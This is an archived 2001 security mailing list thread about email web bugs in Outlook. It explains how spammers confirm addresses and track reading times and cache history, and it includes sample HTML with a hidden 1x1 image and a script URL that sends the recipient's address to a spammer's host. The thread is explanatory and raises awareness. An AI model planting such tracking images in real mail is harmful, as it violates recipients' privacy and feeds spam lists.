Vulnerability Development mailing list archives
Re: Email webbugs
From: "Mariano Vassallo" <anakin () edunexo com>
Date: Tue, 28 Aug 2001 15:13:36 -0300
afaik, webbugs work like this: Spammer X sends you an HTML mail with an invisible image from his site <img src=http://www.weluvspam.com/bug.gif height=1 whidth=1> ) When you read this email in Outlook, the image (bug.gif) is downloaded from the spammers site. If the image is generated by a CGI script he can log the time you read your mail, and validate your address. for example, instead of bug.gif, he could use a script to create the image: <img src=http://www.weluvspam.com/createimage.php?mail=youremail () yourdomain com > the script (createimage.php) could : save the "mail=youremail () yourdomain com" parameter to a database of valid email addresses save the time of the day you checked your mail (combined with the time the email was sent - taken from a database- it can be used to know how often a person checks his mail, and at what time) determine wheter you visited a certain website recently (timming how long it takes to load an image from that website. if it loads inmediatly, then you probably have it in your browsers cache) Mariano ----- Original Message ----- From: "Dom De Vitto" <Dom () DeVitto com> To: "Peter Pekala" <peterp () netnitco net>; "abuse" <postmaster () getinfo org>; "Focus-MS" <focus-ms () securityfocus com> Cc: "VULN-DEV@SECURITYFOCUS. COM" <VULN-DEV () securityfocus com>; "BUGTRAQ@SECURITYFOCUS. COM" <BUGTRAQ () securityfocus com>; <win2ksecadvice () listserv ntsecurity net> Sent: Tuesday, August 28, 2001 5:42 AM Subject: RE: Email webbugs
Webbugs are NOT return receipts!! Everybody should *at least* have return-receipts set to 'prompt'. That is a no-brainer. Web bugs are totally different, and can divulg a lot more information - especially when tallied with cross-host information. Dom -----Original Message----- From: Peter Pekala [mailto:peterp () netnitco net] Sent: 27 August 2001 17:11 To: abuse; Focus-MS Cc: VULN-DEV@SECURITYFOCUS. COM; BUGTRAQ@SECURITYFOCUS. COM; win2ksecadvice () listserv ntsecurity net Subject: Re: Email webbugs In Outlook Express - Have you tried configuring this through Tools - Options - Receipts - Returning Read Receipts ? - Peter : One of the things that has always bothered me about Outlook Express and : Outlook is that they are susceptable to webbugs. Basically there are no : options to block confirmation of your reading an email so any spammer
can
: verify that your address is active as long as they can get you to just view : an email. : : A lot of people have difficulty understanding exactly what this means so
I
: set up a demonstration page at http://www.nthelp.com/OEtest/oe.htm in an : attempt to raise awareness of this nonsense and get MS to do something about : it. I don't know if other email programs like Eudora and Netscape are : vulnerable to email webbugs so if anyone tests those please let me know the : results. : : Anyway, I've made the test site available to the public now so if you
want
: to check your email reader, feel free. : : Geo. :
--------------------------------------------- Servicio provisto por EDUNEXO ---------------------------------------------
Current thread:
- Email webbugs abuse (Aug 27)
- Re: Email webbugs Peter Pekala (Aug 27)
- RE: Email webbugs Dom De Vitto (Aug 28)
- Re: Email webbugs Mariano Vassallo (Aug 28)
- Re: Email webbugs James Robbins (Aug 28)
- RE: Email webbugs Dom De Vitto (Aug 28)
- Re: Email webbugs Peter Pekala (Aug 27)
- Re: Email webbugs ezat_t (Aug 27)
- <Possible follow-ups>
- RE: Email webbugs Javier Palomares Lopez (Aug 27)
- Re: Email webbugs edgar . mendez (Aug 27)
- Re: Email webbugs John Hicks (Aug 31)
- RE: Email webbugs Hicks, John (Aug 31)